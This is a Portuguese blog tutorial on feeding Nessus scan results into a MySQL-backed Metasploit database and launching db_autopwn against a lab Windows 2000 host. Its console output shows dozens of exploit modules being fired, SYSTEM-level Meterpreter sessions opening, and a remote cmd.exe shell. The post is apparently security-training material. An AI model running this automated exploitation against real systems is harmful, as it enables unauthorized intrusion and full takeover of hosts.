Usando o Nessus plugin com o MySQL e o db_autopwn no Metasploit

<p>No <a href="http://blog.alexos.com.br/?p=1996">post anterior</a> apresentei como a integração entre o <a href="http://www.nessus.org">Nessus</a> e o <a href="http://www.metasploit.com">MSF</a> pode tornar nossa vida bastante interessante.</p> <p>Agora irei rebuscar os testes usando o <a href="http://www.mysql.com/">MySQL</a> para manter os alvos e suas vulnerabilidades em uma base de dados, explorando-as de forma automatizada com o <a href="http://blog.metasploit.com/2006/09/metasploit-30-automated-exploitation.html">db_autopwn</a>.</p> <p>O ambiente dos testes continuará o mesmo:</p> <p>Host Debian com o Nessus, Metasploit e o MySQL<br /> Host Windows 2000</p> <p>Pré-requisito para os testes:</p> <p>Possuir os seguintes itens instalados:</p> <blockquote><p> * libdbd-mysql-ruby1.8<br /> * Módulo activerecord ( gem install activerecord ) </p></blockquote> <p>Preparando o ambiente</p> <p>Inicei o driver para MySQL no MSF</p> <blockquote><p> <strong>msf> db_driver mysql</strong> </p></blockquote> <p>Conectei o banco e criei uma base de dados chamada msf</p> <blockquote><p> <strong>msf> db_connect msf:******@localhost/msf</strong> </p></blockquote> <p>Importei o report do Nessus para o banco</p> <blockquote><p> <strong>msf> nessus_report_get af55d200-77a4-fe0e-7baa-90a11eeab4839ecaf20114aac8b0<br /> </strong> </p></blockquote> <p>Listando as portas apartir da base de dados msf</p> <blockquote><p> <strong><br /> msf> db_services<br /> </strong></p> <p>Services<br /> ========</p> <p>created_at info name port proto state updated_at Host Workspace<br /> &#8212;&#8212;&#8212;- &#8212;- &#8212;- &#8212;- &#8212;&#8211; &#8212;&#8211; &#8212;&#8212;&#8212;- &#8212;- &#8212;&#8212;&#8212;<br /> Fri Oct 01 12:06:03 UTC 2010 ftp 21 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default<br /> Fri Oct 01 12:06:03 UTC 2010 epmap 135 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default<br /> ri Oct 01 12:06:03 UTC 2010 135 udp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default<br /> Fri Oct 01 12:06:03 UTC 2010 netbios-ns 137 udp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default<br /> Fri Oct 01 12:06:03 UTC 2010 smb 139 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default<br /> Fri Oct 01 12:06:03 UTC 2010 cifs 445 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default<br /> Fri Oct 01 12:06:03 UTC 2010 dce-rpc 1025 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default<br /> Fri Oct 01 12:06:03 UTC 2010 dce-rpc 1028 udp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default<br /> Fri Oct 01 12:06:03 UTC 2010 www 5800 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default<br /> Fri Oct 01 12:06:03 UTC 2010 www 5801 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default<br /> Fri Oct 01 12:06:03 UTC 2010 vnc 5900 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default<br /> Fri Oct 01 12:06:03 UTC 2010 vnc 5901 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default </p></blockquote> <p>Listando as vulnerabilidades apartir da base de dados msf</p> <blockquote><p> <strong><br /> msf > db_vulns<br /> </strong></p> <p>[*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=5901 proto=tcp name=NSS-19288 refs=<br /> [*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=5901 proto=tcp name=NSS-10342 refs=<br /> [*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=21 proto=tcp name=NSS-22964 refs=<br /> [*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=5900 proto=tcp name=NSS-19288 refs=<br /> [*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=5900 proto=tcp name=NSS-10342 refs=<br /> [*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=5801 proto=tcp name=NSS-24260 refs=<br /> [*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=5800 proto=tcp name=NSS-10758 refs=<br /> [*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=5800 proto=tcp name=NSS-10107 refs=<br /> [*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=5800 proto=tcp name=NSS-43111 refs=<br /> [*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=1028 proto=udp name=NSS-10736 refs=<br /> &#8230;. </p></blockquote> <p><strong><br /> O db-autopwn<br /> </strong></p> <p>O db_autopwn escaneará a base de dados e criará uma lista de módulos específicos para cada vulnerabilidade existente no alvo. A criação destes módulos ocorrerá de 2 formas:</p> <p> 1 &#8211; Os exploits serão carregados através da análise da lista de vulnerabilidades. Este tipo de cross-referência depende de alguns padrões como OSVDB, Bugtraq, e CVE para vincular o exploit ao alvo.</p> <p> 2 &#8211; Usa portas padrões associadas a cada exploit para localizar os alvos que estão rodando o mesmo serviço. </p> <p><strong><br /> msf > db_autopwn<br /> </strong></p> <blockquote><p> [*] Usage: db_autopwn [options]<br /> -h Display this help text<br /> -t Show all matching exploit modules<br /> -x Select modules based on vulnerability references<br /> -p Select modules based on open ports<br /> -e Launch exploits against all matched targets<br /> -r Use a reverse connect shell<br /> -b Use a bind shell on a random port (default)<br /> -q Disable exploit module output<br /> -R [rank] Only run modules with a minimal rank<br /> -I [range] Only exploit hosts inside this range<br /> -X [range] Always exclude hosts inside this range<br /> -PI [range] Only exploit hosts with these ports open<br /> -PX [range] Always exclude hosts with these ports open<br /> -m [regex] Only run modules whose name matches the regex<br /> -T [secs] Maximum runtime for any exploit in seconds </p></blockquote> <p><strong><br /> Hora da ação <img class="wp-smiley" src="http://blog.alexos.com.br/wp-includes/images/smilies/icon_razz.gif" alt=":P" /><br /> </strong></p> <p><strong><br /> msf > db_autopwn -p -t -e<br /> </strong></p> <blockquote><p> [*] Analysis completed in 7 seconds (0 vulns / 0 refs)<br /> [*]<br /> [*] ================================================================================<br /> [*] Matching Exploit Modules<br /> [*] ================================================================================<br /> [*] 192.168.0.6:5800 exploit/windows/vnc/winvnc_http_get (port match)<br /> [*] 192.168.0.6:445 exploit/windows/smb/ms06_066_nwapi (port match)<br /> [*] 192.168.0.6:21 exploit/windows/ftp/filecopa_list_overflow (port match)<br /> [*] 192.168.0.6:21 exploit/windows/ftp/servu_mdtm (port match)<br /> [*] 192.168.0.6:21 exploit/windows/ftp/easyfilesharing_pass (port match)<br /> [*] 192.168.0.6:445 exploit/windows/smb/netidentity_xtierrpcpipe (port match)<br /> [*] 192.168.0.6:445 exploit/windows/brightstor/ca_arcserve_342 (port match)<br /> [*] 192.168.0.6:445 exploit/linux/samba/trans2open (port match)<br /> &#8230;. </p></blockquote> <blockquote><p> ================================================================================<br /> [*] (1/81 [0 sessions]): Launching exploit/windows/vnc/winvnc_http_get against 192.168.0.6:5800&#8230;<br /> [*] (2/81 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwapi against 192.168.0.6:445&#8230;<br /> [*] (3/81 [0 sessions]): Launching exploit/windows/ftp/filecopa_list_overflow against 192.168.0.6:21&#8230;<br /> [*] (4/81 [0 sessions]): Launching exploit/windows/ftp/servu_mdtm against 192.168.0.6:21&#8230;<br /> [*] (5/81 [0 sessions]): Launching exploit/windows/ftp/easyfilesharing_pass against 192.168.0.6:21&#8230;<br /> [*] (6/81 [0 sessions]): Launching exploit/windows/smb/netidentity_xtierrpcpipe against 192.168.0.6:445&#8230;<br /> [*] (7/81 [0 sessions]): Launching exploit/windows/brightstor/ca_arcserve_342 against 192.168.0.6:445&#8230;<br /> [*] (8/81 [0 sessions]): Launching exploit/linux/samba/trans2open against 192.168.0.6:445&#8230;<br /> [*] (9/81 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwwks against 192.168.0.6:139&#8230;<br /> &#8230;. </p></blockquote> <blockquote><p> [*] (81/81 [0 sessions]): Waiting on 35 launched modules to finish execution&#8230;<br /> [*] Meterpreter session 1 opened (192.168.0.3:46168 -> 192.168.0.6:15979) at Fri Oct 01 10:37:39 -0300 2010<br /> [*] Meterpreter session 2 opened (192.168.0.3:43223 -> 192.168.0.6:24353) at Fri Oct 01 10:37:40 -0300 2010<br /> [*] (81/81 [2 sessions]): Waiting on 22 launched modules to finish execution&#8230;<br /> [*] (81/81 [2 sessions]): Waiting on 12 launched modules to finish execution&#8230;<br /> [*] (81/81 [2 sessions]): Waiting on 11 launched modules to finish execution&#8230;<br /> [*] (81/81 [2 sessions]): Waiting on 11 launched modules to finish execution&#8230;<br /> [*] (81/81 [2 sessions]): Waiting on 11 launched modules to finish execution&#8230;<br /> &#8230;. </p></blockquote> <blockquote><p> [*] The autopwn command has completed with 2 sessions<br /> [*] Enter sessions -i [ID] to interact with a given session ID<br /> [*]<br /> [*] ================================================================================</p> <p>Active sessions<br /> ===============</p> <p> Id Type Information Connection Via<br /> &#8212; &#8212;- &#8212;&#8212;&#8212;&#8211; &#8212;&#8212;&#8212;- &#8212;<br /> <strong><br /> 1 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ W2KVITIMA 192.168.0.3:46168 -> 192.168.0.6:15979 exploit/windows/dcerpc/ms03_026_dcom<br /> 2 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ W2KVITIMA 192.168.0.3:43223 -> 192.168.0.6:24353 exploit/windows/dcerpc/ms03_026_dcom<br /> </strong><br /> [*] ================================================================================ </p></blockquote> <p>Iniciando a sessão</p> <p><strong><br /> msf > sessions -i 1<br /> </strong></p> <blockquote><p> [*] Starting interaction with 1&#8230; </p></blockquote> <p><strong><br /> meterpreter > execute -i -H -f cmd.exe<br /> </strong></p> <blockquote><p> Process 736 created.<br /> Channel 1 created.<br /> <strong><br /> Microsoft Windows 2000 [Version 5.00.2195]<br /> (C) Copyright 1985-1999 Microsoft Corp.</p> <p>C:\WINNT\system32><br /> </strong> </p></blockquote> <p><strong><br /> Observações importantes:<br /> </strong></p> <blockquote><p> <strong><br /> 0 &#8211; Isso não é magia é tecnologia</p> <p>1 &#8211; Estes testes são de caráter totalmente experimental;</p> <p>2 &#8211; O uso destas ferramentas e ações requerem alguns conhecimentos prévios como:</p> <p> * Entender sistemas operacionais;<br /> * Entender profundamente o protocolo TCP/IP;<br /> * Entender o funcionamento dos exploits, payloads, shellcodes e etc;<br /> * Entender a dinâmica das causas e os impactos das vulnerabilidades;<br /> * Usar estes conhecimentos de forma ética;<br /> </strong> </p></blockquote> <div><h3>See:</h3><ul><li><a href="http://blog.alexos.com.br/?p=1996&amp;lang=pt-br" class="crp_title">Brincando com o plugin do Nessus para o Metasploit</a></li><li><a href="http://blog.alexos.com.br/?p=101&amp;lang=pt-br" class="crp_title">Usando Nmap</a></li><li><a href="http://blog.alexos.com.br/?p=297&amp;lang=pt-br" class="crp_title">Usando o Nikto webserver scanner</a></li><li><a href="http://blog.alexos.com.br/?p=1954&amp;lang=pt-br" class="crp_title">DLL Hijacking também afeta algumas Linux distros</a></li><li><a href="http://blog.alexos.com.br/?p=852&amp;lang=pt-br" class="crp_title">Instalando o Open-Audit no Debian 5.0</a></li></ul></div><p><a href="http://www.addtoany.com/add_to/google_bookmarks?linkurl=http%3A%2F%2Fblog.alexos.com.br%2F%3Fp%3D2068%26amp%3Blang%3Dpt-br&amp;linkname=Usando%20o%20Nessus%20plugin%20com%20o%20MySQL%20e%20o%20db_autopwn%20no%20Metasploit" title="Google Bookmarks" class="a2a_button_google_bookmarks" target="_blank"><img src="http://blog.alexos.com.br/wp-content/plugins/add-to-any/icons/google.png" height="16" alt="Google Bookmarks" width="16" /></a> <a href="http://www.addtoany.com/add_to/twitter?linkurl=http%3A%2F%2Fblog.alexos.com.br%2F%3Fp%3D2068%26amp%3Blang%3Dpt-br&amp;linkname=Usando%20o%20Nessus%20plugin%20com%20o%20MySQL%20e%20o%20db_autopwn%20no%20Metasploit" title="Twitter" class="a2a_button_twitter" target="_blank"><img src="http://blog.alexos.com.br/wp-content/plugins/add-to-any/icons/twitter.png" height="16" alt="Twitter" width="16" /></a> <a href="http://www.addtoany.com/add_to/technorati_favorites?linkurl=http%3A%2F%2Fblog.alexos.com.br%2F%3Fp%3D2068%26amp%3Blang%3Dpt-br&amp;linkname=Usando%20o%20Nessus%20plugin%20com%20o%20MySQL%20e%20o%20db_autopwn%20no%20Metasploit" title="Technorati Favorites" class="a2a_button_technorati_favorites" target="_blank"><img src="http://blog.alexos.com.br/wp-content/plugins/add-to-any/icons/technorati.png" height="16" alt="Technorati Favorites" width="16" /></a> <a href="http://www.addtoany.com/add_to/google_gmail?linkurl=http%3A%2F%2Fblog.alexos.com.br%2F%3Fp%3D2068%26amp%3Blang%3Dpt-br&amp;linkname=Usando%20o%20Nessus%20plugin%20com%20o%20MySQL%20e%20o%20db_autopwn%20no%20Metasploit" title="Google Gmail" class="a2a_button_google_gmail" target="_blank"><img src="http://blog.alexos.com.br/wp-content/plugins/add-to-any/icons/gmail.png" height="16" alt="Google Gmail" width="16" /></a> <a href="http://www.addtoany.com/add_to/linkedin?linkurl=http%3A%2F%2Fblog.alexos.com.br%2F%3Fp%3D2068%26amp%3Blang%3Dpt-br&amp;linkname=Usando%20o%20Nessus%20plugin%20com%20o%20MySQL%20e%20o%20db_autopwn%20no%20Metasploit" title="LinkedIn" class="a2a_button_linkedin" target="_blank"><img src="http://blog.alexos.com.br/wp-content/plugins/add-to-any/icons/linkedin.png" height="16" alt="LinkedIn" width="16" /></a> <a href="http://www.addtoany.com/add_to/google_reader?linkurl=http%3A%2F%2Fblog.alexos.com.br%2F%3Fp%3D2068%26amp%3Blang%3Dpt-br&amp;linkname=Usando%20o%20Nessus%20plugin%20com%20o%20MySQL%20e%20o%20db_autopwn%20no%20Metasploit" title="Google Reader" class="a2a_button_google_reader" target="_blank"><img src="http://blog.alexos.com.br/wp-content/plugins/add-to-any/icons/reader.png" height="16" alt="Google Reader" width="16" /></a> <a href="http://www.addtoany.com/add_to/wordpress?linkurl=http%3A%2F%2Fblog.alexos.com.br%2F%3Fp%3D2068%26amp%3Blang%3Dpt-br&amp;linkname=Usando%20o%20Nessus%20plugin%20com%20o%20MySQL%20e%20o%20db_autopwn%20no%20Metasploit" title="WordPress" class="a2a_button_wordpress" target="_blank"><img src="http://blog.alexos.com.br/wp-content/plugins/add-to-any/icons/wordpress.png" height="16" alt="WordPress" width="16" /></a> <a href="http://www.addtoany.com/add_to/slashdot?linkurl=http%3A%2F%2Fblog.alexos.com.br%2F%3Fp%3D2068%26amp%3Blang%3Dpt-br&amp;linkname=Usando%20o%20Nessus%20plugin%20com%20o%20MySQL%20e%20o%20db_autopwn%20no%20Metasploit" title="Slashdot" class="a2a_button_slashdot" target="_blank"><img src="http://blog.alexos.com.br/wp-content/plugins/add-to-any/icons/slashdot.png" height="16" alt="Slashdot" width="16" /></a> <a href="http://www.addtoany.com/add_to/reddit?linkurl=http%3A%2F%2Fblog.alexos.com.br%2F%3Fp%3D2068%26amp%3Blang%3Dpt-br&amp;linkname=Usando%20o%20Nessus%20plugin%20com%20o%20MySQL%20e%20o%20db_autopwn%20no%20Metasploit" title="Reddit" class="a2a_button_reddit" target="_blank"><img src="http://blog.alexos.com.br/wp-content/plugins/add-to-any/icons/reddit.png" height="16" alt="Reddit" width="16" /></a> <a href="http://www.addtoany.com/add_to/delicious?linkurl=http%3A%2F%2Fblog.alexos.com.br%2F%3Fp%3D2068%26amp%3Blang%3Dpt-br&amp;linkname=Usando%20o%20Nessus%20plugin%20com%20o%20MySQL%20e%20o%20db_autopwn%20no%20Metasploit" title="Delicious" class="a2a_button_delicious" target="_blank"><img src="http://blog.alexos.com.br/wp-content/plugins/add-to-any/icons/delicious.png" height="16" alt="Delicious" width="16" /></a> <a href="http://www.addtoany.com/add_to/multiply?linkurl=http%3A%2F%2Fblog.alexos.com.br%2F%3Fp%3D2068%26amp%3Blang%3Dpt-br&amp;linkname=Usando%20o%20Nessus%20plugin%20com%20o%20MySQL%20e%20o%20db_autopwn%20no%20Metasploit" title="Multiply" class="a2a_button_multiply" target="_blank"><img src="http://blog.alexos.com.br/wp-content/plugins/add-to-any/icons/multiply.png" height="16" alt="Multiply" width="16" /></a> <a href="http://www.addtoany.com/add_to/digg?linkurl=http%3A%2F%2Fblog.alexos.com.br%2F%3Fp%3D2068%26amp%3Blang%3Dpt-br&amp;linkname=Usando%20o%20Nessus%20plugin%20com%20o%20MySQL%20e%20o%20db_autopwn%20no%20Metasploit" title="Digg" class="a2a_button_digg" target="_blank"><img src="http://blog.alexos.com.br/wp-content/plugins/add-to-any/icons/digg.png" height="16" alt="Digg" width="16" /></a> <a href="http://www.addtoany.com/add_to/identi_ca?linkurl=http%3A%2F%2Fblog.alexos.com.br%2F%3Fp%3D2068%26amp%3Blang%3Dpt-br&amp;linkname=Usando%20o%20Nessus%20plugin%20com%20o%20MySQL%20e%20o%20db_autopwn%20no%20Metasploit" title="Identi.ca" class="a2a_button_identi_ca" target="_blank"><img src="http://blog.alexos.com.br/wp-content/plugins/add-to-any/icons/identica.png" height="16" alt="Identi.ca" width="16" /></a> <a href="http://www.addtoany.com/share_save" class="a2a_dd addtoany_share_save"><img src="http://blog.alexos.com.br/wp-content/plugins/add-to-any/share_save_171_16.png" height="16" alt="Share" width="171" /></a> </p>